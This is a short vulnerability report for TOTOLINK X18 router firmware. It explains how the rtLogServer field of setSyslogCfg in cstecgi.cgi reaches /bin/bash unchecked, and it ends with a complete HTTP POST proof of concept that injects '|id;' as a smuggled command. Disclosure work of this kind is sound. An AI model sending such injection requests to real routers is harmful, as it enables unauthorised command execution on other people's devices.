TOTOLINKļ¼X18 V9.1.0cu.2024_B20220329
TOTOLINKļ¼X18 V9.1.0cu.2021_B20220326
https://www.totolink.net/home/menu/detail/menu_listtpl/download/id/226/ids/36.html
cstecgi.cgi, the rtLogEnabled parameter and rtLogServer parameter of setSyslogCfg are controllable, and the input rtLogEnabled parameter is not checked. By setting rtLogEnabled = 1, string splicing is indirectly triggered, resulting in command execution after calling CsteSystem. ida did not correctly analyze the parameters of CsteSystem.
CsteSystem comes from the/usr/lib/libcscommon.so. Through analysis, you can know that the command will eventually be executed by calling/bin/bash through execv
Poc:
POST /cgi-bin/cstecgi.cgi HTTP/1.1
Host: 192.168.109.161
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko/20100101 Firefox/73.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 68
Origin: <http://192.168.109.161>
Connection: close
Referer: <http://192.168.109.161/advance/syslog.html?timestamp=1667554800074>
Cookie: SESSION_ID=2:1667546811:2
{"rtLogEnabled": "1","rtLogServer":"|id;","topicurl":"setSyslogCfg"}
Test screenshot: